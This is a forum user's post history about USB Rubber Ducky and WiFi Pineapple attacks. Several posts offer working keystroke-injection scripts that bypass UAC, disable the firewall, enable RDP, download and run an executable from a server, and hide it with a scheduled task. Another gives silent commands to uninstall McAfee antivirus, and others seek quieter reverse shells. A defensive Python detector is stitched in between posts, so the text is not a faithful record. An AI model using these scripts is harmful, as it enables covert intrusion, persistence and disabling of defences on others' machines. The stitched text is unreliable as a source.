Everything posted by TeCHemically

  1. After further testing it appears as though the SD cards have been somehow corrupted or damaged by the twin ducky. I reflashed the firmware and got no change. I checked the SD cards on 2 other PCs (one Linux, one Windows) and on the Windows PC I got "I/O" errors in the pop-up dialog box. I am always "safely removing" the mounted storage before I take it out of the PC I am working on. Has anyone else had SD corruption issues with the twin duck? Thanks to all who reply! :)
  2. I am also having issues with Twin Duck original firmware. It has been functional through my testing today but just about a half hour ago the DUCKY storage drive no longer mounts and the inject.bin does not run either. Tried on 2 PCs. I get an alternating fast and slow red LED flashing on one PC and I get no lights at all on the other. The storage will mount if I put the SD card in another reader.
  3. I found the following little tidbit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D
     VirusScan Enterprise (VSE) command line removal using msiexec.exe: Click Start, Run. Type the removal string for your version of VSE, then click OK.
     VirusScan Enterprise 8.8: msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q
     VirusScan Enterprise 8.7i: msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q
     VirusScan Enterprise 8.5i: msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q
     VirusScan Enterprise 8.0i: msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q
     Switches that you can use with msiexec.exe:
     /q The quiet switch ensures the removal is done silently - nothing is displayed.
     /x This switch will automatically remove an installation.
     /i This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation.
     /? This switch provides additional information on all msiexec.exe command switches.
  4. Thanks for the help! :) Can the 64-bit https meterpreter shell run on a 32-bit machine? Also, I generated the above-mentioned dll via msfconsole, but the command I used just allowed me to specify https. Is this created 64-bit by default, or is there a part of the command I missed that will create the 64-bit shell? Thanks again, this is a great method!
  5. Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connection being so noticeable? I try to make sure my listener is on a common port so it can get through the network firewall, and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thanks again!
  6. Ok, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case connection is lost. If this task has already been run in the past it will replace the scheduled task with the name "Management". DELAY 5000 ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 ALT Y DELAY 800 ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'" ENTER DELAY 300 STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" ENTER DELAY 300 STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2 ENTER DELAY 300 STRING y ENTER STRING exit ENTER
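From the defender's side, the persistence described in the post above leaves two artifacts worth checking: a hidden+system executable in the user's Startup folder and a scheduled task whose action points into that folder. The following is an added example (not from the post or from simple-ducky) that flags both in constructed samples standing in for `attrib` and `schtasks /query /fo csv /v` output; the user name, paths and column subset are assumptions.

```python
import csv
import io
import re

# Any path inside a per-user Startup folder (case-insensitive on Windows).
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# One `attrib` output line: attribute letters, then a path starting with a drive letter.
ATTRIB_LINE_RE = re.compile(r"^\s*([A-Z ]*?)\s*([A-Za-z]:\\.*\S)\s*$")

# Constructed sample of `attrib` run against the Startup folder (assumed user "alice").
SAMPLE_ATTRIB = (
    "A            C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\n"
    "A   SH       C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winmgmt.exe\n"
)

# Constructed subset of the columns `schtasks /query /fo csv /v` emits.
SAMPLE_TASKS = (
    '"TaskName","Task To Run","Schedule Type","Repeat: Every"\n'
    '"\\Management","C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winmgmt.exe","Hourly","2 Hour(s)"\n'
    '"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c","Weekly","N/A"\n'
)


def hidden_system_startup_files(attrib_text):
    """Return Startup-folder paths that carry both the H and S attributes."""
    hits = []
    for line in attrib_text.splitlines():
        m = ATTRIB_LINE_RE.match(line)
        if not m:
            continue
        flags, path = m.group(1).replace(" ", ""), m.group(2)
        if STARTUP_RE.search(path) and "H" in flags and "S" in flags:
            hits.append(path)
    return hits


def tasks_launching_from_startup(csv_text):
    """Return (task name, command) pairs whose action lives in a Startup folder."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [(row["TaskName"], row["Task To Run"])
            for row in reader if STARTUP_RE.search(row["Task To Run"])]


def findings(attrib_text, csv_text):
    """Combine both checks into a list of (kind, detail) tuples for triage."""
    out = [("hidden_system_startup_file", p) for p in hidden_system_startup_files(attrib_text)]
    out += [("task_runs_from_startup", f"{name} -> {cmd}")
            for name, cmd in tasks_launching_from_startup(csv_text)]
    return out


if __name__ == "__main__":
    for kind, detail in findings(SAMPLE_ATTRIB, SAMPLE_TASKS):
        print(kind, detail)
```

The Startup folder normally contains nothing with the system attribute set, and a legitimate scheduled task rarely points there, so either hit alone is worth a closer look.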
  7. This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D ****************************************************************************************************************************** DELAY 5000 ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 ALT Y DELAY 800 ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'" ENTER STRING exit ENTER ****************************************************************************************************************************** You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above. Then in terminal type the following 2 commands: cd /usr/share/ducky/encoder (for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in) java -jar encoder.jar -i payload.txt -o inject.bin (now place the "inject.bin" file on your ducky and use as you normally would)
  8. Everything appears to have been successful on the client side, but I don't get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully, so I know it is not a network issue. EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent.
  9. No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?...Nevermind, I found it in home directory. Thanks again! :)
  10. Great script, I am super excited to test this one out :D One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 minutes ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error:
     [*] Generating shellcode
     /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST= LPORT=443 C (Errno::ENOENT)
     from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'
     from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'
     Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)
  11. Thanks Seb, great to have you full time on this project!
  12. Ok, tried a different USB drive with more space just in case. I reset the pineapple and ran all the installs fresh. Everything has installed now except mdk3. It won't install internally or to USB. I definitely have enough space and have rebooted. Also, the SSID persistent setting does not work after reboots.
  13. Sorry Seb, but the pineapple bar update did not fix the issue in any previous attempts. I went through the whole re-flash and update process again and for some reason this time it is installing things. I am having to try many times for a couple of items but they are now installing. Thanks for your replies! The only 3 now that are not installing are sslstrip, get, and mdk3. The tiles for sslstrip and mdk3 are there but they won't install. The newcomer "get" does not install properly at all. It does appear to, but no tile results, and under installed items it is listed with no size value next to it. That one may be a bug with the new infusion. The other 2 may be a space issue. How much space does each one take and where can I look to verify that I have enough space left?
  14. Thanks for your responses. Unfortunately I verified the md5 both times I downloaded the firmware; and I updated the pineapple bar each time I have reset or re-flashed first thing. Still having the same issues.
  15. I have reset my pineapple many times and have reinstalled the new 3.0.0 firmware but still am getting a very low percentage of infusions that will install at all (only one installed successfully this go around). Some appear to install but give an error in the tile or simply say "not installed" in the tile and cannot be installed from their main window. Most freeze on the percent installed pop-up box and never get past it. I am having the SSID persistent issue with karma also. Please help! My once grand and useful tool is now a source of extreme frustration and regret.
  16. I ran the 32-bit setup and selected the "/usr/lib/jvm/jdk1.7.0_17/jre/bin/java" option. The following error is what I get:
     Your new JDk version is...
     /usr/bin/simple-ducky: line 3892: /usr/bin/java: cannot execute binary file
     Would you like to return to the main menu [y/n]?
     When I try to generate the inject.bin from a selected payload I get the following:
     Generating your inject.bin file...
     /usr/bin/simple-ducky: line 1021: /usr/bin/java: cannot execute binary file
     Your payload has been created, its located in /usr/share/ducky/encoder
     Your evil executable has been created, it is in located at /var/www/winmgmt.txt
     Press any key to contiue
  17. Thanks skysploit! I am running kali 1.0.3 686. This happens with every payload I try. This is my output from that last bit:
     java -version
     java version "1.6.0_27"
     OpenJDK Runtime Environment (IcedTea6 1.12.4) (6b27-1.12.4-1)
     OpenJDK Server VM (build 20.0-b12, mixed mode)
     So it appears that my java update has not gone through successfully. I have tried this on a kali 1.0.2 686 VM, kali 1.0.3 686 VM, and on a BT5r3 VM. All failed in much the same way.
  18. Thank you for the response! Please forgive my ignorance, but I still do not know exactly how to accomplish this, or even if it is the real issue. Will simply running these commands in sequential order resolve this issue? I tried the first two commands in kali and neither one is accepted as a valid command.
  19. Ok, it seems that this issue is caused by the java environment variable pointing to the wrong version. How can I change this variable to point to the 1.7.0 java version that simple ducky installs?
  20. I get the following error on all payloads that I try to generate on Kali 1.0.3 VM (I have already updated 64-bit java):
     Exception in thread "main" java.lang.UnsupportedClassVersionError: Encoder : Unsupported major.minor version 51.0
     at java.lang.ClassLoader.defineClass1(Native Method)
     at java.lang.ClassLoader.defineClass(ClassLoader.java:634)
     at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
     at java.net.URLClassLoader.defineClass(URLClassLoader.java:277)
     at java.net.URLClassLoader.access$000(URLClassLoader.java:73)
     at java.net.URLClassLoader$1.run(URLClassLoader.java:212)
     at java.security.AccessController.doPrivileged(Native Method)
     at java.net.URLClassLoader.findClass(URLClassLoader.java:205)
     at java.lang.ClassLoader.loadClass(ClassLoader.java:321)
     at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:294)
     at java.lang.ClassLoader.loadClass(ClassLoader.java:266)
     Could not find the main class: Encoder. Program will exit.
     The end result is that no inject.bin file is ever created. The payload.txt file is created, but I cannot manually use encoder from the terminal to convert that to the inject.bin either. Kali linux has the pae kernel and should be considered 64-bit, right? When I updated java should I have selected 32-bit? Could that be the cause of my grief? UPDATE: Just tried this all out in BT5r3 with the other linux installer and I am getting the exact same error. I know it is 32-bit and I used the 32-bit java update option. I am not even getting the payload.txt generated in the ducky folder in BT5r3. Also, when installing dependencies it downloaded the latest 64-bit metasploit installer, but MSF is already installed and fully updated. Should I bother running this installer? I fear it will bork up my MSF install. Thanks for all who respond! :)
  21. I am not getting the option to install to USB after following Darren's instructions. The lsusb output shows a "device 001: ID xxxx:xxxx linux foundation 2.0 root hub" & "device 003: ID xxxx:xxxx super top". My fstab shows config mount data for /dev/sda1 under /usb set as ext4 with "rw,sync" options and "option enabled_fsck 0". Under config swap, option device shows "/dev/sda2" & option enabled shows "1". Any idea why this is failing?
  22. I also have USB with swap mounted and writable, but sslstrip fails to install to it or to the internal memory. The infusion module is installed but sslstrip itself won't install.
  23. I am having the same issue with an attempted DNS spoof to an https site; it fails every time.
  24. Thanks for your help! I found this one closer http://www.ebay.com/itm/290803061413?ssPageName=STRK:MEWNX:IT&_trksid=p3984.m1497.l2649 will it work? Holding the reset button for 7 seconds did not change anything, but I do have the default SSID now being broadcast. When I try to connect to the browser I still have the redirect error. If I attempt the IP:1471 I am now getting the page and all the defaults are reset. How can I go about fixing this redirect issue? Also, to the other reply, no I did not look at the change log. Did I miss something important? I did read that 2.7.0 was a stable release but did not go farther than that. My apologies for my frustration yesterday and thank you for your help!